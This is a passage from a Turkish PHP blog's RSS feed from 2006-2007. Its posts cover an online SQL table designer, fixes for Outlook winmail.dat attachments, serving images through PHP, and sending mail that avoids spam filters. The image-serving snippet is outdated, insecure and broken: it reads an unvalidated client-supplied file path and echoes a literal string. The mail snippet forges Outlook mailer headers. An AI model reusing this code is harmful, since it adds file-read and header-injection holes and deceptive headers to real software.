<category><![CDATA[Linux]]></category> <category><![CDATA[PHP]]></category> <category><![CDATA[SQL]]></category> <category><![CDATA[Visual Basic]]></category> <category><![CDATA[css]]></category> <category><![CDATA[design]]></category> <category><![CDATA[dhtml]]></category> <category><![CDATA[diagrams]]></category> <category><![CDATA[mssql]]></category> <category><![CDATA[mysql]]></category> <category><![CDATA[oracle]]></category> <category><![CDATA[postgresql]]></category> <category><![CDATA[propel]]></category> <category><![CDATA[schema]]></category> <category><![CDATA[tasarım]]></category> <category><![CDATA[xml]]></category><guid isPermaLink="false">http://www.muzafferakyil.com/2007/04/12/makale/php/admin/kisa-yoldan-sql-tablo-tasarimi.aspx</guid> <description><![CDATA[Hiç başınıza geldimi bilmiyorum ama elinizde tablo tasarımı yapacak bir program bulunmadığı anda SQL komutları ile cebelleşerek tablo oluşturdunuz mu ? Evet şimdi web üzerinde istediğiniz tabloyu oluşturup rahatlıkla FK yapıp bu oluşturduğunuz tabloları XML, MSSQL, MySQL, PostgreSQL, PROPEL, Oracle gibi veritabanı sistem diline çevirebilir, geçici olarak kaydedebilir, tasarımınızın çıktısını alabilirsiniz. Buyrun efendim ; Link]]></description> <content:encoded><![CDATA[<p>Hiç başınıza geldimi bilmiyorum ama elinizde tablo tasarımı yapacak bir program bulunmadığı anda SQL komutları ile cebelleşerek tablo oluşturdunuz mu ? Evet şimdi web üzerinde istediğiniz tabloyu oluşturup rahatlıkla FK yapıp bu oluşturduğunuz tabloları XML, MSSQL, MySQL, PostgreSQL, PROPEL, Oracle gibi veritabanı sistem diline çevirebilir, geçici olarak kaydedebilir, tasarımınızın çıktısını alabilirsiniz.<span id="more-64"></span></p><p>Buyrun efendim ;</p><p><a href="http://muzaffer.akyil.net/tools/sql" title="SQL Tasarımcı" target="_blank" class="liinternal">Link</a></p> <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fmuzaffer.akyil.net%2F2007%2F04%2F12%2Fmakale%2Fyazilim%2Fphp%2Fadmin%2Fkisa-yoldan-sql-tablo-tasarimi.aspx&amp;layout=standard&amp;show_faces=true&amp;width=450&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:80px;" allowTransparency="true"></iframe><img class="colorbox-64"  src="http://muzaffer.akyil.net/?ak_action=api_record_view&id=64&type=feed" alt="" />]]></content:encoded> <wfw:commentRss>http://muzaffer.akyil.net/2007/04/12/makale/yazilim/php/admin/kisa-yoldan-sql-tablo-tasarimi.aspx/feed</wfw:commentRss> <slash:comments>2</slash:comments> </item> <item><title>winmail.dat Outlook Ek Dosya Sorunsalı</title><link>http://muzaffer.akyil.net/2007/04/11/makale/yazilim/php/admin/winmaildat-outlook-ek-dosya-sorunsali.aspx</link> <comments>http://muzaffer.akyil.net/2007/04/11/makale/yazilim/php/admin/winmaildat-outlook-ek-dosya-sorunsali.aspx#comments</comments> <pubDate>Wed, 11 Apr 2007 09:53:34 +0000</pubDate> <dc:creator>Muzaffer Ali AKYIL</dc:creator> <category><![CDATA[Internet]]></category> <category><![CDATA[PHP]]></category> <category><![CDATA[dat]]></category> <category><![CDATA[ek dosya]]></category> <category><![CDATA[microsoft]]></category> <category><![CDATA[outlook]]></category> <category><![CDATA[sorun]]></category> <category><![CDATA[Windows]]></category> <category><![CDATA[winmail]]></category> <category><![CDATA[xp]]></category><guid isPermaLink="false">http://www.muzafferakyil.com/2007/04/11/makale/php/admin/winmaildat-outlook-ek-dosya-sorunsali.aspx</guid> <description><![CDATA[Outlook ile gönderilen bir attachment (ek) li bir mailin karşı tarafa sadece winmail.dat isminde bir dosya ile ekli olarak gittiği hiç başınıza geldimi bilmiyorum ama benim geldi ve ufak bir araştırma sonucunda çözüm yolunu buldum. Evet bu sorun baya insanın başına gelmiş ki bunun için program bile yazılmış :) Çözüm yolu aşağıda : Kısayoldan Halletme [...]]]></description> <content:encoded><![CDATA[<p>Outlook ile gönderilen bir attachment (ek) li bir mailin karşı tarafa sadece winmail.dat isminde bir dosya ile ekli olarak gittiği hiç başınıza geldimi bilmiyorum ama benim geldi ve ufak bir araştırma sonucunda çözüm yolunu buldum.<span id="more-63"></span><br /> Evet bu sorun baya insanın başına gelmiş ki bunun için program bile yazılmış :)<br /> Çözüm yolu aşağıda :</p><ul><li>Kısayoldan Halletme<br /> Size gelen mailin ekinin uzantısını biliyorsanız (.zip,.rar,.mp3) winmail.dat dosyasının uzantısını buna çevirerek dosyayı kullanabilirsiniz.</li><li>Online Tool ile<br /> Sorunu çözmek için yaptığım araştırmalar esnasında karşıma bir php tool çıktı. Bende onu sitemde kullanmaya karar verdim. Online Tool için <a href="http://tud.at/php/tndef/" target="_blank" class="liexternal previewlink">tıklayınız</a>.</li><li>Gönderen taraflı çözüm<br /> Microsoft ilgili sorun için bir KB çıkarmış. <a href="http://support.microsoft.com/kb/278061" target="_blank" class="liexternal previewlink">Buradan</a> ulaşabilirsiniz.</li></ul><p>Umarım bu bilgiler faydalı olmuştur.<br /> Saygılar&#8230;</p> <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fmuzaffer.akyil.net%2F2007%2F04%2F11%2Fmakale%2Fyazilim%2Fphp%2Fadmin%2Fwinmaildat-outlook-ek-dosya-sorunsali.aspx&amp;layout=standard&amp;show_faces=true&amp;width=450&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:80px;" allowTransparency="true"></iframe><img class="colorbox-63"  src="http://muzaffer.akyil.net/?ak_action=api_record_view&id=63&type=feed" alt="" />]]></content:encoded> <wfw:commentRss>http://muzaffer.akyil.net/2007/04/11/makale/yazilim/php/admin/winmaildat-outlook-ek-dosya-sorunsali.aspx/feed</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>resmi php ile görüntüleme</title><link>http://muzaffer.akyil.net/2006/07/17/makale/admin/resmi-php-ile-goruntuleme.aspx</link> <comments>http://muzaffer.akyil.net/2006/07/17/makale/admin/resmi-php-ile-goruntuleme.aspx#comments</comments> <pubDate>Mon, 17 Jul 2006 14:26:11 +0000</pubDate> <dc:creator>Muzaffer Ali AKYIL</dc:creator> <category><![CDATA[Makalelerim]]></category> <category><![CDATA[PHP]]></category><guid isPermaLink="false">http://www.muzafferakyil.com/2006/07/17/resmi-texte-gomup-php-ile-goruntuleme/</guid> <description><![CDATA[Bazen kimsenin elimizdeki resimlerin linklerine ulaşmalarını istemeyiz. Yada resimleri dynamic yapmak isteriz. Bu durumda imdadımıza php yada asp tarzı script dilleri koşuyor. PHP ile nasıl yapılır ? Bu işlemi bir örnekle göstermek istedim. Örnekte php ye gömmek istediğimiz dosyamızı seçiyoruz ve formu gönderdiğimizde bizim php kodlarımız onu alıp içeriğini okuyup bir php dosya içine header [...]]]></description> <content:encoded><![CDATA[<p>Bazen kimsenin elimizdeki resimlerin linklerine ulaşmalarını istemeyiz. Yada resimleri dynamic yapmak isteriz. Bu durumda imdadımıza php yada asp tarzı script dilleri koşuyor. PHP ile nasıl yapılır ?<span id="more-31"></span></p><p>Bu işlemi bir örnekle göstermek istedim. Örnekte php ye gömmek istediğimiz dosyamızı seçiyoruz ve formu gönderdiğimizde bizim php kodlarımız onu alıp içeriğini okuyup bir php dosya içine header functionu ile bir resim olusturarak basıyor. Kodları incelerseniz anlatılmak istenileni rahatlıkla anlarsınız.</p><p>Kolay gelsin..</p><p><code lang="html"></p><form name="form1" method="post" action="ddosya.php" enctype="multipart/form-data"> <input name="dosya" type="file" /> <input name="olay" value="Gönder" type="submit" /></code><br /> <code lang="php"><br /> if(@$olay == "Gönder") {<br /> $di = fopen ($dosya, "r");<br /> $dosyatip = substr("$dosya_name",strrpos($dosya_name,".")+1);<br /> $boyut = filesize ($dosya);<br /> $dicerik = fread ($di, $boyut);<br /> fclose ($di);<br /> $encdosya=base64_encode($dicerik);<br /> header("Content-type: image/$dosyatip");<br /> header("Content-length: $boyut");<br /> echo base64_decode('$encdosya');<br /> </code></p> <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fmuzaffer.akyil.net%2F2006%2F07%2F17%2Fmakale%2Fadmin%2Fresmi-php-ile-goruntuleme.aspx&amp;layout=standard&amp;show_faces=true&amp;width=450&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:80px;" allowTransparency="true"></iframe><img class="colorbox-31"  src="http://muzaffer.akyil.net/?ak_action=api_record_view&id=31&type=feed" alt="" />]]></content:encoded> <wfw:commentRss>http://muzaffer.akyil.net/2006/07/17/makale/admin/resmi-php-ile-goruntuleme.aspx/feed</wfw:commentRss> <slash:comments>0</slash:comments> </item> <item><title>php ile spamsız mail gönderme</title><link>http://muzaffer.akyil.net/2006/07/16/makale/admin/php-ile-spamsiz-mail-gonderme.aspx</link> <comments>http://muzaffer.akyil.net/2006/07/16/makale/admin/php-ile-spamsiz-mail-gonderme.aspx#comments</comments> <pubDate>Sun, 16 Jul 2006 15:52:06 +0000</pubDate> <dc:creator>Muzaffer Ali AKYIL</dc:creator> <category><![CDATA[Makalelerim]]></category> <category><![CDATA[PHP]]></category><guid isPermaLink="false">http://www.muzafferakyil.com/2006/07/16/php-ile-spam-olmayan-mail-gonderme/</guid> <description><![CDATA[PHP kodlayan bir çok insanın başına devamlı gelen bir olaydır bu. Sitenizin üyelerine gönderdiği mailler junk-spam-bulk klasörlerine düşerler devamlı. Bir Email neden spam olarak algılanır ? Sunucu IP adresleri global spam listelerinde kara listede olabilir. SPF(sender policy framework) dediğimiz alıcı pop sunucusuna maili gönderenin gerçek bir mail sunucusu olduğunu belirten policynin kurulu olmaması. Reverse DNS [...]]]></description> <content:encoded><![CDATA[<p>PHP kodlayan bir çok insanın başına devamlı gelen bir olaydır bu. Sitenizin üyelerine gönderdiği mailler junk-spam-bulk klasörlerine düşerler devamlı.<span id="more-33"></span></p><p>Bir Email neden spam olarak algılanır ?</p><ul><li>Sunucu IP adresleri global spam listelerinde kara listede olabilir.</li><li>SPF(sender policy framework) dediğimiz alıcı pop sunucusuna maili gönderenin gerçek bir mail sunucusu olduğunu belirten policynin kurulu olmaması.</li><li>Reverse DNS (Ters DNS) kayıtlarının oluşturulmaması sonucu alıcı gönderenin ip si üzerinden gönderenin domainini kontrol ettiğinde karşısına bu sonucun çıkmaması durumu</li><li>Ve başlıkla ilgili olan konumuz mail formatında header dediğimiz başlıkların eksik yada hatalı girilimi</li></ul><p>Header gönderdiğimiz mailin nereden geldiği, neyle yazıldığı, ne formatta olduğunu bildirir. Benim kullandığım ve Hotmail, Gmail, Yahoo gibi sistemlerde sorunsuz bir şekilde mail göndermemi sağlayan kodları kullanımınıza sunuyorum.</p><p>İyi Çalışmalar</p><p>Kodlar :<br /> <code lang="php"><br /> $gonderenisim = "Muzaffer AKYIL";<br /> $gonderenadres = "<span class="mh-email">muza<a href='http://www.google.com/recaptcha/mailhide/d?k=01AkCzEre5W0xy2fWbkAhqgg==&amp;c=vYN84-7kF4d-8Hv4GdyGI4yrbRdQR4PI30bq1W34Bpk=' onclick="window.open('http://www.google.com/recaptcha/mailhide/d?k=01AkCzEre5W0xy2fWbkAhqgg==&amp;c=vYN84-7kF4d-8Hv4GdyGI4yrbRdQR4PI30bq1W34Bpk=', '', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=300'); return false;" title="Reveal this e-mail address">...</a>@qtechnics.net</span>";<br /> $kime = "<span class="mh-email">adr<a href='http://www.google.com/recaptcha/mailhide/d?k=01AkCzEre5W0xy2fWbkAhqgg==&amp;c=IliEi01fdgBQednnSgTxNQ==' onclick="window.open('http://www.google.com/recaptcha/mailhide/d?k=01AkCzEre5W0xy2fWbkAhqgg==&amp;c=IliEi01fdgBQednnSgTxNQ==', '', 'toolbar=0,scrollbars=0,location=0,statusbar=0,menubar=0,resizable=0,width=500,height=300'); return false;" title="Reveal this e-mail address">...</a>@adres.com</span>";<br /> $konu = "Deneme Maili";<br /> $mesaj = "deneme mesajı, mailin içeriği";</code></p><p>$headers  = &#8220;MIME-Version: 1.0\n&#8221;;<br /> $headers .= &#8220;Content-Transfer-encoding: 7bit\n&#8221;;<br /> $headers .= &#8220;Content-type: text/plain; charset=windows-1254\n&#8221;;<br /> $headers .= &#8220;From: \&#8221;$gonderenisim\&#8221; &lt;$gonderenadres&gt;\n&#8221;;<br /> $headers .= &#8220;Return-path: $gondeenadres\n&#8221;;<br /> $headers .= &#8220;Reply-To: \&#8221;$gonderenisim\&#8221; $gonderenadres\n&#8221;;<br /> $headers .= &#8220;X-MSmail-Priority: Normal\n&#8221;;<br /> $headers .= &#8220;X-Mailer: Microsoft Office Outlook, Build 11.0.5510\n&#8221;;<br /> $headers .= &#8220;X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1441\n&#8221;;<br /> $headers .= &#8220;X-Sender: $gonderenadres\n&#8221;;</p><p>mail($kime, $konu, $mesaj, $headers);<br /> ?&gt;</p> <iframe src="http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fmuzaffer.akyil.net%2F2006%2F07%2F16%2Fmakale%2Fadmin%2Fphp-ile-spamsiz-mail-gonderme.aspx&amp;layout=standard&amp;show_faces=true&amp;width=450&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:450px; height:80px;" allowTransparency="true"></iframe><img class="colorbox-33"  src="http://muzaffer.akyil.net/?ak_action=api_record_view&id=33&type=feed" alt="" />]]></content:encoded> <wfw:commentRss>http://muzaffer.akyil.net/2006/07/16/makale/admin/php-ile-spamsiz-mail-gonderme.aspx/feed</wfw:commentRss> <slash:comments>3</slash:comments> </item> </channel> </rss>
<!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using memcached
Page Caching using memcached
Database Caching using memcached
Object Caching 860/1006 objects using memcached

Served from: muzaffer.akyil.net @ 2012-02-09 10:13:03 -->
